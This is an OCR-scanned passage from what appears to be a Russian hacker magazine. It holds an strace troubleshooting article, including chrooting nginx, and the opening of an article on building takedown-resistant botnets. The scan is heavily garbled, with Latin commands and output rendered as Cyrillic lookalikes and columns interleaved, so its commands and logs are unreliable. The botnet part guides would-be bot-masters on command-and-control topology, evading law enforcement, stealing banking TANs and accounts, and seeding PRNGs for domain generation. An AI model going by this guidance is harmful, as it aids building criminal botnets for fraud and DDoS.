ШірмідрГТ?- і .е . ял . 9 =г> уиіг/ІІЬ/ІІЬрвп^К?-] .В.ір.е (9хѲвВ9Т7477с1ВІ9Ве«|' 
ЬбТгсс^у|К,іО,& -> Лиг /1; ІІіЛібІгкІѴрг . 50 . & ||В*?»е7^47^1159г9№к 
иьто<ітсоп.!1|}.!і>.1 -> /и^гДШДІЫопссолТід.'и.І ГСх9«еа7Т47ТЛ5і№{Мі] 

^ /ц4Г/к1Ь/1іЬдіЭк'7і1і-2.Ѳ.50.Ві 4 віл9йвй7 Г47 ГсяЬН«в<|[ 

ІіЬдіІк ріхЬиГ-г.В.яр.В ■> /ияг/кІЬ/ІкЬдйк рІхЬиГ-З.е.яр.В '|ВхВВ«В'/І47Ісг'ЭЭеВВ|І 
Ііііролдос^ігр 1,Ѳ,50,Э ^ /ІКГД іЬ/Ші|№пдогПЧ го 1,0, ю.Э ^?іЙВ807і4ТІС.'Я5&в&1 
іі!)[)вюае-і,е.5і!.е -> ,7ы!г/ш/ііічиР9о-і,В'ло.е і;ехміав7Т47Гсвэч^і 
1,ІЬі;.ізго,50.3 Уі*>гДІЬЛ№созго.5р. 2 і9ів9«7Н7(і:!ЫІв«Ц 
ііі>аіл-2,В'.5о.е -о /и5г/иіі7і:іьаіо-2.0.54і.е іа.хвѳ«97Д7к>е»ѳ9] 
ІкЬде«}«:т-2.в.50.9 /ц5г/к1Ь/11Ьдв«1«т-2.в.50.» 4 ал«»етМ7 ГсФМНаг 

1іЬдвоі1иІ.Е-2.В.яр.В ^ /иіг/кіЬ/ІіЬднВиІЕ-^.В.яо.В ІВпВвВбТН^ІЬЕЬвВв#^ 
ІЫідгііГЕогі^-7.0.яр.В тгѵ /ікг/ИЬ/1кІід71іГЕлгі’2.0.іР.В 4 0іЯВ00ТІ4ТІЬс1]ЭВ«О|і 
ІІБД.50.1 7ІІІ)7І1І>ГІ.'».1 і;ехв>№7І'47^ЬЗ[іЪВв9] 

иЬдІІР-2.9.50.9 '> 71І1]/(1ІчШі-2.#ЛО.е С«хН»7Т47ТБ7ссС»1 
1іЫ;к1.Ыі.6 /р5Г/ІкЬ/1іЬХ11.4й.е (ех&вйвТТ47ГЬ4№йВв] 

ІкЬяяриггіІ.ял.7 ■> /иіг/ІІЬ/ІІЬляпіянІ.юЛ (0ХВВВ07І47 РЬіЬ^ВВВ] 

=> ДіЬ/иі)И-5О,'0 (0хММ7^47Рй731В«Р 
1к05ійс*4,5«,9 -> 7и5Г/ІіЬ7ДР5І{1С4-).Л0.« [Сх»еав7Т47Т4СІ4евв1 
1іЬдсс.4.50.1 ^ ДіИ/иі>дсе_5.'ЫіЛ [ех»9в7Т47Т0вабВбв] 

ІІЬс.го.6 /иЬ^ІкИіс.іо.'й (0Х.0ВВ49/ Р47 РлВгЭВВв |і 
/1 , 3 ЬС4/1,іІ Л ^ [ШК іВБ-64 . ІО- 7 і!Вх0ВВ<В774Т Рліі77ІЮВ ^ 
ітох^ло.б -> /115Г7иі]7І1ІЯВ4^.50.9 19х№еВТН71в47]9е9? 

Ік№«п4ег.іа.1 /ИБГДІІІ/кІІЯгмнІВГ.іЛ Л ІвКІ}«еі)7Т47Т92«7«9) 
ІіЬиіЛЕта-іР-1 ж?г /ц>г/иЬ/1іЬКкпЕГоні.ір.1 4Вііі0№й7Г47ГЕВ43В«&к 
ІкЬХІ.ІР.Б ^ /ІКГ/ІІЬ/ИЬХІ.ІО.'Б ІВя0ВВ07Р4ТРВе5ЭВѲ0Р 

ііьхтйпвг.іо.г ‘•> /05г/иь/иьхгпо^г,ил (ехееве7Д7І9о4іе«] 



ІсІсІ для Рігеі'ох 



невних. Пора расчехлять зігасе. Остановил апачи запустил трасси- 
ровку: 



# зСгасе -:Е -о /■Ьтр/арас]те2 . зСгасе \ 
/еСс/іпіР . (і/арас]те2 зСагС 



Правка Вид Терніи нал Справка 



ас3^р:і5й^^йрі;-1арі:ор:'5 5’Егасе -I -е ггасе=ореп ^іге^ох 2=*і |, дгер -ѵ ЕМОЕГГГ 
;::;реп(''/егс/Ій,50.сйсІіе'Ч 0_Р^Е]ОN^V) = 3 

=реп{"/иЬ/ІіЬс.50.6", 0_РШОМІУ) = 3 

ѵрсп("/иЕг/ЬШПгеГох'Ч 0_Й00N^V) = 3 

РГОСЁ55. 8782 а1:1:ас^іесі 

[рі<) 87821 орепГ7еі:сД<),5о,сасРіе". О кооніУІ = з 

[рІ4І 8782] арепГ7ІіЬДіЬс.50,6'Ч О НООМЕѴ) = 3 

[ріб 8782] орепС/иаг/Ьіп/ѵтІіісК", о ИООНЕѴІ^ = з 

РгосезЕ 8782 гіеііас^есі 

--- 5ІССНЕР {СІ 1 ІІЙ ехиеЛ (ѳ) --- 
Р го се 55 8783 аПас^іей 

[рій 8783] орепГ7еі:сД<1.зо.сасІіеѵ о 800МЕУ] = з 

[рій 8783] орепГ71ІЬ/ІІЬс,50.8Д 0 800МІУ) ^ 3 

[рід 8783] ореп('7и5г/5Ьаге/ІсісаІе/ІосаІе.а1іа5‘7 0_800МЬѴ) = 3 

[рі<1 8783] орепГ7^I5гДіЬ/^оса^е/г^_Ш.^^1;^8/^С_1^ЕNТ1ПСАПОN^ 0_ВООМЬУ) = 3 

[рігі 8783] ареп{ ѴіізгДіЬУдсопѵ/дсопѵ-ііюсІиІеьдасЬе", О 880МІІУЗ = 3 

[рі<) 8783] орепГ7и5г/1іЬ/Іосаге/ги яи.ииГв/ЕС НЕА5и8ЕНЕ№Т", о ршомьу) = з 

[рІ4І 8783] ареп('7и5гДіЬ/ІасаІе/гу Ди.и1:іа/ЕС ТЁ^ЕРН^«Е^ О 800МІУ) = 3 

[рій 8783] орепГ7и5гДіЬ/Іосаге/ги ш.иі;Г8ДС_А008Е55". о ноонеу} = з 

[рШ 87831 орепГ7и5г/иьАосаІе/гу аи.иі;І8/ІС_МАНе-. 0 800МІУ) = 3 

[рій 8783] ореп{'7и5гДіЬДоса1е/ги йи.уі:Г8/ЕС РАРЕИ'Ч о иоомьу) = з 

[рііі 87831 ореп{Ѵи5г/ІШІосэІе/ги_8и.и1;Ге/ІС_НЕ$5АіЗЕ5", 0_8аОМІУ) = 3 

[рІ4І 8783] йреп!'7и5ГДіЬ/І0Са1е/Ги «и.иСШЕС НЕ55АйЕѴ5Ѵ5 ЕС МЕ55АСЕ5", О РЧЗО 

г^ЕУ) =3 

[рігі 8783] арепГ7и5гДіЬ/ЕосаІе/ги_Ни.иЕЕ8/ЕС_М0МЕТА8У'Ч О ИООМЬУ) = 3 

[рі(І 8783] ореп('7и5г/ІіЬ/Еосаге/ги ш.иЕГЕ/ЕС СОЕШЁ". О коонЕУ) = Э 

[ріа 8783] ареп( '7и5гДіЬуЕосаІЕ/ги йи.иН8/ЕС ТІНЕ", О КООМЕУ] = 3 

[рі<) 8783] орепГ7и5гДіЬ/ЕосаІе/ги 8и.иЕІ8/ЕС N^МЕКК". о воокеу] = з 

[рдсі 87831 ореп( Ѵіі5гДіЬ7ЕосаІе/ги_ни.иЕЕ8АС_СТѴРЕ\ 0_К8тѴ) =3 

Ргосе^і 8783 гіеЕасЗіей 

■” 5ІССНІВ (СІяіУ ехіЕсіі) ^8 (Ѳ) 

орегк(ѵеЕс/Е(].50.сасІіе"р 0_800МЬУ) = 3 

преа(ѴгіЬ/ІіЬс.50.6\ 0_МЮМІУ) ^ 3 

среп{Ѵи5Г/ЕіЬ/Нга]=ох-Э.6.3/ЕігеГох"н 0 800МЕУ) = 3 

Ргосеіь 8784 аЕЕэсІіесІ 

[рігі 8784] арЕпС7еЕсД{1.5С.сасЬе“, О КООЛЕУ} = 3 

[рі(1 8784] ореп{'7ЕІЬДІЬс,50.8'7 О п^ОN^У) = 3 

[рій 8784] орЕп('7ч5г/5ІіагЁ/ІасаІеДосаЕе.аІіа5'\ О КООМІѴ) = 3 



К при запуске 



Послетого, как скрипт отправки почты (с нехитрым названием таіі. 
рЬр) был несколько раз запущен из браузера, а арасбе остановлен, 
можно приступать к анализу лога. 

$ дгер таіІ.рИр Лтр/арасМе2.5(гасе 

5345 геасі ( 9 , "СЕТ /таіі.ріір НТТР/1 . 1 \г\пНозС : 

12" ... , 8000) = 397 

5345 зСаР ( " /ѵаг/ѵ\?ѵ7ѵ\[/таі1 . ріір " , {зР_тосіе = 3_ 

ІРЕЕСІ0644, зР_зІ2е=25б, ...}) =0 

5345 ІзСаР ( " /ѵаг/ѵ^ѵлл^/таіі . ріір " , { зР_тосіе = 3_ 

ІЕЕЕСІ0644, зР_зІ2е=25б, ...}) =0 

5345 ореп ( " /ѵаг/ѵ^ѵ^ѵ^/таіі . ріір " , 0_ЕВ0ЫЕУ) = 10 

Здесь в каждой строчке первое поле — РІО, второе — вызов с пара- 
метрами, третье — значение, которое вернул вызов. В большинстве 
случаев, если возвращаемое значение не отрицательное — вызов 
отработал без ошибки. То есть, дгерпотаіі.рбрне дал ничего инте- 
ресного, кроме РІ 0-процесса (5345), который его обрабатывал. Что ж, 
запустим дгер по РІО: 

$ дгер 5345 Лтр/арасМе2.5(гасе 

5340 сіопе ( с]ті1сі_зРаск=0 , Т1адз = СЕ0ЫЕ_СНІЕВ_ 
СЕЕАЕТІВ I СЕОЫЕ_СНІЕВ_ЗЕТТІВ | ЗІССНЕВ , с]ті1сі_ 
Рісір1:г=0х7ТЗЫ2еа(іа10 ) = 5345 

5345 геасі ( 9 , "СЕТ /таіі.ріір НТТР/1 . 1 \г\пНоз1: : 

12" ... , 8000) = 397 

5345 зРаР ( " /ѵаг/ѵ^ѵ^ѵ^/таіі . ріір " , {зР_тосіе = 3_ 
ІЕЕЕСІ0644, зР_зІ2е=25б, ...}) =0 

5345 сіопе ( с1іі1(і_зРаск=0 , Р1адз = СЕ0ЕЕ_СНІЕВ_ 
СЕЕАЕТІВ I СЕОЕЕ_СНІЕВ_ЗЕТТІВ | ЗІССНЕВ , СІіІ1(а_ 
Рі(ірРг=0х7РЗЬР2еа(іа10 ) = 5347 



$ дгер 5347 Лтр/арасНе2.5(гасе 

5345 сіопе (с1іі1сі_зРаск=0 , Р1адз = СЕ0НЕ_СНІЕВ_ 
СЕЕАЕТІВ I СЕОНЕ_СНІЕВ_ЗЕТТІВ | ЗІССНЕВ , СІ1ІІСІ_ 
РісірРг=0х7РЗЬР2еа(іа10 ) = 5347 

5347 ехесѵе ( " /Ып/зН" , ["зН", "-с", "/изг/зЫп/ 
зепсітаіі -Р -і "] , [/* б ѵагз */] = -1 ЕАССЕЗ 
(Регтіззіоп сіепіесі) 

Бинго! Для отправки почты используется /и5г/5Ьіп/5епбтаі[,а 
вызов ругается на отсутствие прав. Причем права на зепбтаіі 
выставлены корректно, а вот на /Ьіп/зб — нет. Каким-то образом 
оказалось, что права на /Ып/зб были 770 (при владельце и группе 
ГООІ:), то есть пол ьзовател ь ѵѵѵѵѵѵ-баіа (от которого работал ара обе) 
не имел прав на выполнение. Корректировка прав исправила это 
недоразумение. 

ПРОБЛЕМЫ с СЕТЬЮ 

Иногда зігасе позволяет решать сетевые проблемы гораздо быстрее, 
чем Ісрбитр. В частности, с помощью зігасе оченьудобно отслежи- 
вать, к каким сервисам и в каком порядке обращается приложение 
для определения имен. 

Однажды ясменилІРдля одного домена, но, несмотря на то, что 
бід выдавал мне правильный новый ІР, бгеіох все еще ломился на 
старый. Трассируем: 

$5(гасе -е Ігасе=пеІѵѵогкПге^ох хакер. ги 

7879 зоскек (РЕ_ЕІЕЕ, ЗОСК_ЗТЕЕАМ | ЗОСК_СЕОЕХЕС I ЗОСК_ 
ЫОЫВЕОСК, 0) = 3 

7 87 9 соппеск(3, { за_Таті1у=АЕ_ЕІЕЕ , рак1і= " /ѵаг/гип/ 
пзссЗ/зоскек " } , 110) = 0 

7 87 9 зепсіко(3 , " \2\0\0\0\ѵ\0\0\0\7\0\0\0раззѵ^сі\0 " , 
19, МЗС_ЫОЗІСЫАЕ, ЕЕЕЕ , 0) =19 



Опять ничего интересного по поводу ошибки. Но на последней 
строчке с помощью системного вызова сіопе создается дочерний 
процесс с РІО 5347. Ухты, квест! :) Огер по 5347: 



Вызов ООП пес! из листинга показывает, что Рігеіох сначала обра- 
щается к сервису N500 (кэширующий демон) для разрешения имен 
а только потом, если N500 ничего не выдаст — к 0N5. На ноутбуке 
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Файл Правка вид терминал Справка 




4 гезсІ^И -й /изг/ІіЬ/НгеГох-Э.О.З/І'ігеІ^ок-Ьіп 


ругіашіс зесііоп аі: Ѳхс1а5г соп.^аіп5 54 еп^гіе5: 


тад Туре 




матс/ѵаіие 




(ГІЕЕОЕО) 


51іагес) ІіЬгагу: |ІіЬр^Лгеа(1.50.9] 


вхооооош-оооовоо 1 


4МЕЕОЕ0) 


5І1ЭГЁ0 ІіЬгагу^ ПІЬхиІ.501 


вхѲѲѲ9988В80оевѲѲ1 


4МЁЕОЁ0) 


БІіагесІ ІіЬгагу: ІІіЬтог] 5 . 5о] 




(МЕЕОЕО) 


Эііэгес) ІіЬгагу: |1іЬхрс«і.5сі] 


ѳхѳѳэввовввоеѳеѳѳі 


(МЕЕОЕО) 


5Ьаге:і ІіЬгагу: 


0Х09Э99ВВ00000000І 


(Г4ЕЕ0ЕО) 


5ЬагеіЛ ІіЬгагу: |ІіЬр1с4.5о| 


0Х9ВѲВВВ8800000091 


{НЕЕ0Е0І 


5Іпэге4 ІіЬгэгу: П1Ьь5рг4.&о1 


0Х0999ВВВВВ0000991 


4ПЁЕ0ЕО) 


5Ьагес1 ІіЬгагу: ІІіЬйІ.зоЛ] 


0х@ѲЭ9Ѳе^0000ѲѲ91 


(МЕЕОЕОІ 


ЗІіэгеіі ІіЬгагу: ПІЬдІк-кІІ-г.Ѳ.&Р.О] 


ѳхѳѳввввввввѳеѳѳѳі 


(МЕЕОЕО) 


5Ьаге(і ІіЬгагу: ЦіЬаНк-і.Ѳ.іо.Ѳ] 


0X039999000000000 1 


(МЕЕОЕО) 


ЗПагеіІ ІіЬгагу: ПіЬрапдо^Ііг-І.З.ЕО.в] 


ѲХ0ѲѲВВВВ0В0ѲѲѲѲѲ1 


(НЕЕПЕО) 


5Ьаге:і ІіЬгагу: ЦіЫгееі:уре.ьо.б] 


0X0999990000000001 


(ГІЕЕОЕО) 


5Ьагеі1 ІіЬгагу: ІІіЫопІсопГід.іо.І] 


0Х0Ѳ9Ѳ0&&0000Ѳ0001 


{МЕЕОЕ0) 


ІіЬгагу: ПІЬдйк-хі1-2.Ѳ,5Ь,0] 


0X009999980000000 1 


(МЁШЕО) 


ЗЬзгей ІіЬгагу; ІиЬдОк ріхЬиТ-г.Э.во.О] 


ѲХѲ99ВВВВВВ0ѲѲѲѲѲ1 


(НЕЕОЕО) 


БЬагесІ ІіЬгагу: ПіЬрапдосаіго-і.В.зо.Ѳ] 


0x099999999000000 1 


(МЕЕОЕО) 


5№іагес) ІіЬгагу: ПіЬрапдо- 1.8. 50.9] 


ѲХѲѲ0ВВВВВВ0ѲѲѲѲѲ1 


ГНЕЕОЕО) 


ЕЬагесІ ІіЬгагу: |ИЬсаігп.ій.2) 


0x0999909900000091 


(МЕЕ0ЕО) 


5Ьагеі1 ІіЬгагу: ІІіЬд-іо- 2. 0.50.9] 


0ХООВѲ99Ѳ 980000001 


(МЕЕ0Е0) 


гьэгей ІіЬгагу: ПіЬдьЬ^ес1:-2.о.^ь,0] 


0ХОО99ВВ9ВВ0000ОО1 


(МЕЕ0Е0) 


5ЬагесІ ІіЬгагу: ІііЬдпшйиІе-З.О.ьа.В] 


0x0099999800000001 


(NЕЕОЕО) 


5ІіэгеР ІіЬгагу: ІІіЬдіЬгеа(і-2.Ѳ.5Р,0І 


0ХѲѲѲВВВ9ВВ0000ѲѲ1 


(НЕЕОЕО) 


5Ьаге(і ІіЬгагу: ПіЬгі.во.іІ 


0x099999990000009 1 


(ПЕЕОЕО) 


5ІчагесІ ІіЬгагу: ПіЬдііЬ-2. 0.50.9] 


0ХѲѲѲВВВВВВ0000ѲѲ1 


(НЕЕОЕОУ 


5Ьаге:1 ІіЬгагу: ІііЬхп.50.61 


0x0999990900000091 


(ПЕЕ0Е0) 


51іагеі1 ІіЬгагу: |ііЬэ5оипгі .50 . 2] 


0X0000000800000001 


{ЧЕЕ0Е0) 


ЗЬагей ІіЬгагу: ПІЬйі,50.6] 


ѲХѲѲѲВВВВВВ000ѲОѲ1 


(МЕЁ0ЕО) 


ЁЬагесІ ІіЬгагу: ІііЬ5ТЬс++.50.6] 


0x0099989000000091 


(МЕЕОЕО) 


5Ьа гей і і Ьга гу : I ІіЬдс с_5 . 50 . 1 1 


0ХѲѲѲВВВВ8В000ѲѲѲ1 


ІІНЕЕОЕО^ 


БЬагеіі ІіЬгагу: {ііЬс.бо.6] 


0x999999900000009 1 


4ПЕЕ0Е0) 


ЗИагесІ ІіЬгагу: ДсІ-Ііпих-х86-64.50.23 


0X0000008 Ѳ800000ОС 


(ШТ) 


0ХШЭ 


0x099999999000009(1 




0хЬЬ99 



Список динамических библиотек Ріге[ох 



# Шсі /изг/ІосаІ/пдіпх/зЬіп/пдіпх 

Ііпих-даТе . 30 . 1 => (0хЬ7789000) 

ІіЬсгурТ . 30 . 1 => /1іЬ/іб8б/стоѵ/1іЬсгурС . 30 . 1 
(0хЬ7751000) 

ІіЬрсге.зо.З => /изг/1іЬ/1іЬрсге . 30 . 3 (0хЬ7728000) 
ІіЬззІ . 30 . О . 9 . 8 => /изг/1іЬ/іб8б/стоѵ/1іЬзз1 . 

30. 0.9. 8 ( 0хЬ75с34000 ) 

ІіЬсгурРо . 30 . О . 9 . 8 => /изг/1іЬ/іб8б/стоѵ/1іЬсгурРо . 
30. 0.9. 8 ( 0хЬ7ссіе000 ) 

ІіЬг.зо.І => /изг/ІіЬ/ІіЬз . 30 . 1 (ОхЬ75ЬОООО) 
ІіЬс.зо.б => /1іЬ/іб8б/стоѵ/1іЬс . 30 . б (0хЬ74б4000) 
1іЬ(і1.зо.2 => /1іЬ/іб8б/стоѵ/1іЬ(і1.зо.2 (0хЬ74б0000) 
/ІіЬ/іа-Ііпих . 30 . 2 (0хЬ778а000) 

Переносим эти библиотеки в заранее созданное сбгооДокружение 
(например, /сбгооСпдіпх). Дальше, чтобы удостовериться в том, 
что у нас есть все необходимые библиотеки, нужно с помощью Шб 
посмотреть также зависимости скопированных библиотек. Кроме 
библиотек пдіпх'у нужны еще некоторые конфиги и логи. Получим 
список необходимых файлов: 

# зігасе -е (гасе=ореп /изг/ІосаІ/пдіпх/зЬіп/пдіпх 



N500 только мешается, поэтому я его смело удалил, после чего огне- 
лиснашелправильныйайпишник. 

ПРОБЛЕМЫ С ПСЕВДОУСТРОЙСТВАМИ 

Бывает, что какое-то приложение просто виснет, не выдавая никаких 
ошибок и завершаясь только по кі Л. Или работает, но тормозит на, ка- 
залось бы, простейшей операции. Приведу пример: есть старенький 
□еЬіап Еісб, на нем здиіб из репозитория с простой МС5А аутентифи- 
кацией и 5АМ5 для удобного управления. После создания пользо- 
вателя через 5АМ5 при релоаде здиіб долго тормозит на операциях 
добавления пользователей. 

# зігасе -і -о Лтр/затзсіаетоп /е(с/іпі(.сІ/затзс1 зіагі 

15773 13:16:03 зСаС 64 ( " /еДс / здиісЗ/псза . затз " , {зЦ_ 
тосЗе = 3_ІРКЕС I О 644 , зЦ_зІ 2 е = 3 14 , ...}) =0 



ореп ( " /еСс/Ісі . 30 . сасДе " , 0_КВ0ЫЬУ) = 3 
ореп ( " /1іЬ/іб8б/стоѵ/1іЬсгурЦ . 30 . 1 " , 0_КВ0ДЬУ) =3 
ореп ( " /изг/ІіЬ/ІіЬрсге . 30 . 3 " , 0_КВ0ЫВУ) = 3 
ореп ( " /изг/1іЬ/іб8б/стоѵ/1іЬзз1 .30.0.9.8", 0_КВ0ЫВУ ) 
= 3 

ореп ( " /изг/1іЬ/іб8б/стоѵ/1іЬсгурРо .30.0.9.8", 
0_КВ0ЫВУ) = 3 

ореп ( " /еСс/раззѵ^сі" , 0_КВ0ВВУ I 0_СВ0ЕХЕС ) = 4 

ореп ( " /еРс/дгоир" , 0_ЕВ0ЫВУ I 0_СВ0ЕХЕС ) = 4 

ореп ( " /изг/1оса1/пдіпх/1одз/ассезз . Іод" , 0_ШЕ0ВВУ I 0_ 

СЕЕАТ I 0_АРРЕЫВ I 0_ВАЕСЕЕІВЕ, 0644) = 4 

ореп ( " /изг/1оса1 /пдіпх/іодз/еггог . Іод " , 0_ШЕ0ЫВУ I 0_ 
СЕЕАТ I 0_АРРЕЫВ I 0_ВАЕСЕЕІВЕ, 0644) = 5 

Скопируем недостающие файлы, удаляя при этом из конфигов 
ненужную информацию (например, лишних пользователей из /еіс/ 
раззѵѵб). 

Создадим в сбгооДокружении /беѵ/пиЛ, необходимый для нормаль- 
ного функционирования пдіпх'а: 



15773 13:16:03 ореп ( " /еРс / здиісі/псза . затз " , 0_ 
ЕВОЫВУ I 0_АРРЕЫВ | 0_ВАЕСЕЕІВЕ ) = 3 
15773 13:16:03 сІозе(З) = О 

15773 13:16:03 ореп ( " /сіеѵ/гапсіот" , 0_ЕВ0ЫВУ) = 3 
15773 13:16:03 геасі(3. 



# ткпосі /сДгооР /пдіпх/сіеѵ/пиіі с 1 3 

Вот и все. Теперь запускать пдіпх в сбгооі; можно следующим обра- 
зом: 



На последнем вызове система задумывается больше, чем на минуту. 
Значит, проблема в /беѵ/гапбот. ЗАМ 5 применяет его для создания 
хешей паролей пользователей. Самое простое решение — использо- 
вать /б еѵ/и га пб от, который гораздо быстрее, чем /беѵ/гапбот. 

САЖАЕМ мѳтх в ПЕСОЧНИЦУ 

Безопасности много не бывает, поэтому никакая дополнительная 
ступень защиты лишней не будет. Достаточно популярный и простой 
в реализации механизм минимизации урона от взлома — запуск 
приложения в сбгооР Процесс переноса приложения в песочницу не 
сложен, если воспользоваться зігасе и еще одной полезной утилитой 
— [бб (показывает список совместно используемых библиотек ЕЕР- 
файла]. Покажу на примере, как запускать в сбгооі: популярный на 
просторах рунета веб-сервер пдіпх. 

Предположим, что пдіпх (последней на момент написания статьи 
версии 0.8. 40) уже собран с параметрами по умолчанию и лежит в 
/изг/іосаі. Список библиотек, которые нужны ему для работы: 



# сДгооД /сДгооД /пдіпх/ /изг/ Іосаі /пдіпх/ зЬіп/пдіпх 

ЗАКЛЮЧЕНИЕ 

Для применения зігасе есть некоторые ограничения. Во-первых, 
понятно, что не следует использовать этот инструмент в рабочем 
окружении (трассировка арасбе на высоконагруженном ргобисЕоп- 
сервере будет большой ошибкой) — производительность приложе- 
ния в режиме трассировки сильно снижается. Второе ограничение 
— это возможные проблемы с трассировкой 32 -битных приложений 
на 64-битной системе. И, наконец, третье — некоторые проги падают 
при выполнении трассировки вследствие наличия либо багов, либо 
защиты от трассировок (в основном это касается, конечно, проприе- 
тарного софта). 

Несмотря на широкие возможности, зігасе — не «серебряная пуля», 
он не сможет помочь найти причину абсолютно всех проблем. Однако 
это очень хороший инструмент, который обязательно нужно попробо- 
вать, прежде чем браться за дбЬ. пг 
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Искусство 
зомбирования 

Азбука создания неугоняемых ботнетов 

Современные бот-сети по своей численности давно перешагну] 
миллионную планку. Их масштабы позволяют бот-мастерам 
«распараллелить» финансовые потоки от предоставляемых 
услуг. Нынешние подходы к проектированию ботнета позволяют 
использовать его как для осуществления уже ставших классикой 
в наше время ООоЗ-атак, так и для работы на уровне отдельно взятых 
хостов. 




Зачем? Например, с целью получения какой-либо конфиденциальной 
информации, сбора ТАМ (Тгапзасбоп аиіЬепбсабоп питЬег, использует- 
ся в качестве дополнительного средства аутентификации в сервисах 
онлайн-банкинга], аккаунтов к целевым ресурсам. И все эти мани- 
пуляции осуществляются в параллельном режиме разными частями 
одной бот-сети. По мере роста «персональной армии» могут появиться 
дополнительные подводные камни, которые трудно отследить на этапе 
проектировки бота и еще труднее от них избавиться, так как любое изме- 
нение в его архитектуре может разрушить ботнет как карточный домик. 
Именно поэтому у будущего бот-мастера должно быть четкое представ- 
ление масштабов своей сети, решаемых ею задач и варианты действий 
на случай ее утраты. Последний пункт особенно актуален для бот-сетей 
больших масштабов или принадлежащих к кардерской инфраструктуре. 
Заинтересоваться детищем могут как конкуренты, так и правоохрани- 
тельные органы. Все возможные риски должны быть также выявлены и 
устранены на этапе проектировки. Год назад в нашем журнале концеп- 
цию идеального ботнета детально описал Роман Хоменко в своей статье 
«Вечный ботнет». В ней он изложил принципы создания бота, органи- 
зацию получения команд от командного центра, а также внес некоторые 
постулаты проектирования бот-сети. Советую взять его материал за осно- 
ву. В свою очередь, следуя теоретическим аспектам построения «идеаль- 
ной армии», мы рассмотрим практическую сторону создания бота. 

АРХИТЕКТУРА -НАШЕ ВСЕ 

Существует множество способов управления зараженными хостами и 
передача команд каждой машине. Все зависит от конкретных предпо- 
чтений бот-мастера. В зависимости от типа используемого протокола 
командным центром может выступать: 

• Веб-сервер — управление осуществляется через веб-интерфейс. В 
настоящее время это самый распространенный способ (кстати, именно 
его использует нашумевший Хейз]. 

• Іпзіапі; Меззаде среда — передача команд по одному из 
ІМ-протоколов (ІСО, ]аЬЬег, М5М и т.п.|. Используется в бот-сетях с 
небольшим количеством хостов. 



• ІВС — командный центр находится на одном из ІВС-каналов. 
Морально устаревший метод осуществления контроля. В настоящее 
время практически не используется из-за высокой степени вероятности 
изолирования (перехвата] командного центра. 

• Тѵѵіиег-среда — управление ботнетом посредством передачи команд 
в твиттер-аккаунте. Довольно экзотический способ, но имеет право на 
существование в условиях повсеместной распространенности социаль- 
ных сетей и веб-сервисов, предоставляющих свои АРІ. Кстати, в дан- 
ном случае можно не задумываться о том, что командный центр может 
упасть из-за нагрузки своей же «армии», ведь большинство данных 
проектов рассчитаны на огромную аудиторию и имеют соответствующие 
средства масштабируемости. 

• ТСР/ІР-ЬазесІ — управление посредством протоколов, базирующихся 
на стеке ТСР/ІР. Под эту категорию попадают все остальные способы, 
основанные на передаче команд по экзотическим и самописным про- 
токолам. 

Обилие данных методов можно классифицировать всего лишь по двум 
признакам (смотри соответствующие рисунки]: 

• Передача команд посредством командного центра (централизованная 
топология]; 

• Передача команд от бота к боту или Р2Р (децентрализованная топо- 
логия]. 

Удобство централизованных схем объясняется наличием единого 
центра, к которому обращаются боты с целью получения задания. 

Не нужно беспокоиться о своевременном получении команды 
конкретным ботом. Факты получения, выполнения, успешного/ 
неуспешного завершения задачи легко фиксируются, что позволяет 
вести детальную статистику. Однако централизованная топология 
остается актуальной лишь для небольших бот-сетей по следующим 
причинам: 

• Плохая масштабируемость (с ростом числа зараженных хостов растет 
нагрузка на командный центр и увеличивается вероятность осущест- 
вления атаки типа «отказ в обслуживании» на сервер, передающий 
задания]; 
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• Централизованное управление (высокая вероятность изолирования 
командного центра, что немедленно «парализует» весь ботнет). 
Децетрализованная топология полностью лишена вышеперечисленных 
недостатков и в силу особенностей своей архитектуры обеспечивает 
большую «живучесть» бот-сети. Но, как всегда, в бочку меда обязатель- 
но кем-то вылита солидная ложка дегтя, и в нашем случае — не одна: 

1 ) Реег-Ь-реег схема предполагает уведомление каждого бота о суще- 
ствовании других зараженных машин. Эта процедура является довольно 
«палевной», так как необходимо хранить на каждой зараженной рабо- 
чей станции огромный (мы рассматриваем большие ботнеты) файл со 
списком ІР всех ботов сети и в реальном времени его обновлять, если 
требуется доставка команд каждой «боевой единице»; 

2 ) Обновление списка и получение команды требуют дополнительно — 
открытых портов на зараженной машине, что увеличивает вероятность 
обнаружения ботнета; 

3 ) Значительное время затрачивается на передачу задания от хоста к 
хосту (Р2Р) и, соответственно, растет общее время его выполнения; 

4 ) Трудность ведения статистических данных (сколько ботов получили/ 
выполнили задание). 

В большинстве случаев обилие недостатков и сложность реализации 
Р2Р-ботнетов являются решающими факторами в пользу выбора цен- 
трализованной топологии. Мы также не будем изобретать велосипед, а 
воспользуемся мировыми практиками. 

Капризный командный центр, который постоянно находится в условии 
неустойчивого равновесия, стремясь упасть при малейшем росте нашей 
«армии», так и норовит отдаться в руки правоохранительных органов, 
которые вот-вот прикроют главный домен. Пусть прикрывают — хакер 
его сменит. 

ПСЕВДОСЛУЧАЙНЫЕ ИМЕНА 

Генератор псевдослучайных чисел имеет одну особенность, которая 
является ключевой для бот-мастера — получая на вход параметр в виде 
фиксированного значения, ГПЧ генерирует случайную последователь- 
ность, которая будет одинакова на различных рабочих станциях при 
условии получения их генераторами этого параметра. 

Чтобы тебе не пришлось долго искать смысл в использовании ГПЧ, рас- 
смотрим следующую функцию: 

Функция генерации псевдослучайной 
последовательности 

іпС депегаСог (іпС зеесі) { 
згапсі ( зеесі) ; 

/* вывод двадцати первых элементов 
последовательности* / 

:Еог (х = 1; х <= 20; х++) 

ргіпСП ( " іРегаСіоп %сі, гапсі=%сі\п" , х, гапсі ( ) ) ; 
деСсІі ( ) ; 
геРигп о ; 

} 



Осуществлениеатакитипа ООоБ — классика ис- 
пользования ботнета 



Базовыми функциями, отвечающими за инициализацию и генерацию 
псевдослучайной последовательности, являются давно знакомые нам 
згапй ( ) и гапсі ( ) . На основе переменной зеесі функция згапсі ( ) 
инициализирует множество чисел, на котором, в свою очередь, будет 
работать функция генерации гапй ( ) . 

Результат работы функции депегаСог ( ) при значении зеес1=1 23: 

440 

19053 

23075 

Таким образом, зеесІ является тем самым параметром, на основе кото- 
рого будет генерироваться последовательность доменов. 

Легким движением руки и небольшим шевелением извилин генератор 
псевдослучайной числовой последовательности превращается в гене- 
ратор псевдослучайной последовательности доменных имен, результат 
работы которого ты можешь видеть на соответствующем скриншоте. 
Способ генерации доменного имени основан на простой работе со 
строками. Ничего сверхъестественного в исходном коде генератора нет, 
поэтому приводить его здесь не будем — ищи исходники с коммента- 
риями на диске. 

Несколько слов можно сказать об окончаниях доменных имен: домен- 
